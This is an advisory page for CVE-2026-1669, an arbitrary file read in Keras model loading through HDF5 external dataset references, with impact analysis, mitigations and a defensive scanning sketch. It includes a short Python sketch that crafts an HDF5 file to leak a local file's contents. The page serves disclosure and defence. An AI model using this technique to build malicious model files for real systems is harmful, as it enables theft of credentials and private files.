CVE-2026-1669: CWE-73 External Control of File Name or Path in Google Keras
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file that uses HDF5 external dataset references.
AI Analysis
Technical Summary
CVE-2026-1669 is classified under CWE-73 (External Control of File Name or Path) and CWE-200 (Information Exposure) and affects Google Keras versions 3.0.0 through 3.13.1. The issue lies in the model loading mechanism that integrates HDF5 external dataset references: when a .keras model file crafted with malicious external dataset references is loaded, the software can be made to read arbitrary files from the local filesystem. This arbitrary file read allows a remote attacker to disclose sensitive information without authentication or elevated privileges.

The attack vector involves tricking a user or system into loading a malicious model file, which then triggers the file read. Because the vulnerability affects all supported Keras platforms, it is broadly applicable. The CVSS 4.0 score of 7.1 (High) reflects a network attack vector, low attack complexity, and no privileges required, offset by the requirement for user interaction. The vulnerability does not directly affect availability or integrity, but it poses a significant confidentiality risk by exposing local files.

No patches or public exploit code are currently available, and no exploitation in the wild has been reported. The vulnerability highlights a critical gap in how external references inside machine learning model files are handled, underscoring the need for secure parsing and validation mechanisms in ML frameworks.
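To illustrate the underlying mechanism (this is a sketch of HDF5 external storage in general, not the actual Keras code path, and it assumes the third-party h5py library is installed; all file names are hypothetical), a dataset can declare that its raw bytes live in a separate file on disk, so any consumer that reads the dataset receives that file's contents:

```python
# Sketch of the HDF5 external-dataset mechanism this CVE abuses.
# Assumes h5py is installed; file names are illustrative only.
import h5py

# A local file standing in for sensitive data an attacker wants to read.
secret = b"db_password=hunter2\n"
with open("secret.txt", "wb") as fh:
    fh.write(secret)

# Craft an HDF5 file whose dataset bytes are backed by the external file.
with h5py.File("crafted.h5", "w") as f:
    f.create_dataset(
        "weights",
        shape=(len(secret),),
        dtype="u1",
        external=[("secret.txt", 0, len(secret))],  # (path, offset, size)
    )

# Any consumer that naively reads the dataset leaks the external file.
with h5py.File("crafted.h5", "r") as f:
    leaked = f["weights"][:].tobytes()
```

In an attack, the external path would point at a victim file such as a credentials store, and the "weights" read during model loading would return its contents to whoever receives the loaded model's tensors.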
Potential Impact
The primary impact of CVE-2026-1669 is unauthorized disclosure of sensitive local files on systems running vulnerable Keras versions. This can lead to leakage of confidential data such as credentials, configuration files, or proprietary information, potentially facilitating further attacks like privilege escalation or lateral movement. Organizations relying on Keras for machine learning model deployment or development are at risk, especially if they accept or load model files from untrusted sources.

The vulnerability does not directly affect system availability or integrity but significantly compromises confidentiality. Given Keras's widespread use in AI research, development, and production environments, the scope of affected systems is large. Attackers can exploit this vulnerability remotely over the network, but user interaction is required to load the malicious model file, which may limit automated exploitation while still posing a serious threat in environments where model files are shared or downloaded from external sources.

The current lack of known exploits reduces immediate risk but does not diminish the urgency of mitigation. Exposure of sensitive files can have regulatory and reputational consequences, especially in sectors such as finance, healthcare, and critical infrastructure where data confidentiality is paramount.
Mitigation Recommendations
1. Avoid loading Keras model files from untrusted or unauthenticated sources until patches are available.
2. Implement strict validation and sanitization of model files before loading, including checking for suspicious HDF5 external dataset references.
3. Use sandboxed or isolated environments for loading and testing new or untrusted model files to contain potential data exposure.
4. Monitor file access logs and system behavior for unusual read operations triggered by model loading processes.
5. Apply the principle of least privilege to the environment running Keras to limit file system access scope.
6. Stay updated with Google Keras security advisories and apply patches promptly once released.
7. Consider using alternative model loading mechanisms or frameworks that do not support external HDF5 references if immediate patching is not feasible.
8. Educate developers and data scientists about the risks of loading untrusted model files and enforce secure handling policies.
9. Employ network-level controls to restrict access to systems running vulnerable Keras versions from untrusted networks.
10. Conduct regular security assessments of machine learning pipelines to identify and remediate similar risks.
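Recommendation 2 can be prototyped as a pre-load scan. The sketch below is a hypothetical helper (not part of the Keras API, and it assumes h5py is available) that walks an HDF5 weights file and refuses it if any dataset is backed by external storage:

```python
# Hypothetical pre-load scanner: refuse HDF5 weight files whose datasets
# are backed by external storage. Assumes h5py; not part of Keras itself.
import h5py


def find_external_datasets(h5_path):
    """Return [(dataset_name, [(file, offset, size), ...]), ...] for every
    dataset in the file that is stored in external files."""
    hits = []

    def visit(name, obj):
        # Dataset.external is a list of (name, offset, size) tuples, or
        # None when the data lives inside the HDF5 file itself.
        if isinstance(obj, h5py.Dataset) and obj.external:
            hits.append((name, obj.external))

    with h5py.File(h5_path, "r") as f:
        f.visititems(visit)
    return hits


def assert_safe_to_load(h5_path):
    """Raise ValueError before any model-loading code touches the file."""
    hits = find_external_datasets(h5_path)
    if hits:
        names = ", ".join(name for name, _ in hits)
        raise ValueError(
            f"refusing to load {h5_path}: external datasets found: {names}"
        )
```

Since a Keras 3 .keras archive is a zip container, its weights member could first be extracted with the stdlib zipfile module and passed through the same scan before any call to the model loader.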
Affected Countries
United States, China, Germany, Japan, South Korea, United Kingdom, France, Canada, India, Australia
Technical Details
- Data Version: 5.2
- Assigner Short Name:
- Date Reserved: 2026-01-29T22:48:03.030Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 698d03334b57a58fa1d6e844
Added to database: 2/11/2026, 10:31:15 PM
Last enriched: 2/19/2026, 2:14:03 PM
Last updated: 3/29/2026, 4:24:42 AM